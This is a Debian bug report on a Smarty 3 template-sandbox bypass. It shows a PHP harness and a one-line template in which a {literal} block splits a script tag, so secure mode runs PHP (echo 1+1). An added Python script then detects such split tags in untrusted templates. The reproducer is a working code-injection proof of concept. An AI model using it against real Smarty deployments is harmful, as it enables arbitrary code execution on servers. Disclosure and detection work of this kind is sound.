Package: smarty3
Version: All below 3.1.21
Severity: important

Smarty secure mode should allow untrusted users to write templates, without allowing them to execute arbitrary PHP code. However, all smarty3 versions in Debian (sid, Jessie, stable, oldstable) currently have a security hole allowing arbitrary PHP code execution if you can edit templates.

Example:

test.php:

    <?php
    require_once('/home/thue/smarty/libs/SmartyBC.class.php');
    $smarty = new Smarty();
    $smarty->setTemplateDir('templates/');
    $smarty->setCompileDir('templates_c/');
    // secure mode is enabled; this is what should block PHP in templates
    $smarty->enableSecurity();
    $smarty->force_compile = true;
    $tpl = $smarty->createTemplate('test.tpl');
    $tpl->compileTemplateSource();
    $smarty->display('test.tpl');
    ?>

templates/test.tpl:

    {literal}<{/literal}script language=php>echo 1+1;</script>

If secure mode worked, that should output

    <script language=php>echo 1+1;</script>

In smarty3 < 3.1.21 it outputs 2
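An added example, not from the bug report or from Smarty itself, of the audit check an operator could run over templates written by untrusted users while running an affected version: it joins text across {literal} markers before matching, so the split tag from the reproducer above is caught rather than slipping past a naive search. The sample templates are constructed for the example.

```python
import re

# Constructed sample templates (not taken from any real deployment).
# "split_tag" is the reproducer from the bug report: the {literal} block
# splits "<script" so a check on the raw template text never sees the tag.
SAMPLES = {
    "split_tag": "{literal}<{/literal}script language=php>echo 1+1;</script>",
    "plain_tag": '<script language="php">echo 1+1;</script>',
    "benign": "{literal}<b>{/literal}{$name}</b>",
}

# PHP entry points that must not appear in a template from an untrusted author:
# the <script language=php> form, plus the classic, short-echo and ASP-style tags.
PHP_TAG = re.compile(
    r"<script\s+language\s*=\s*['\"]?php['\"]?\s*>"
    r"|<\?php\b|<\?=|<%",
    re.IGNORECASE,
)


def normalize(template: str) -> str:
    """Remove {literal}/{/literal} markers so text split around them is joined."""
    return re.sub(r"\{/?literal\}", "", template)


def find_php_tags(template: str) -> list:
    """Return every PHP tag found in the template after literal-normalisation."""
    return [m.group(0) for m in PHP_TAG.finditer(normalize(template))]


def audit(samples: dict) -> dict:
    """Map each template name to the list of offending tags (empty means clean)."""
    return {name: find_php_tags(tpl) for name, tpl in samples.items()}


if __name__ == "__main__":
    for name, hits in audit(SAMPLES).items():
        status = "REJECT" if hits else "ok"
        print(f"{name:10s} {status:6s} {hits}")
```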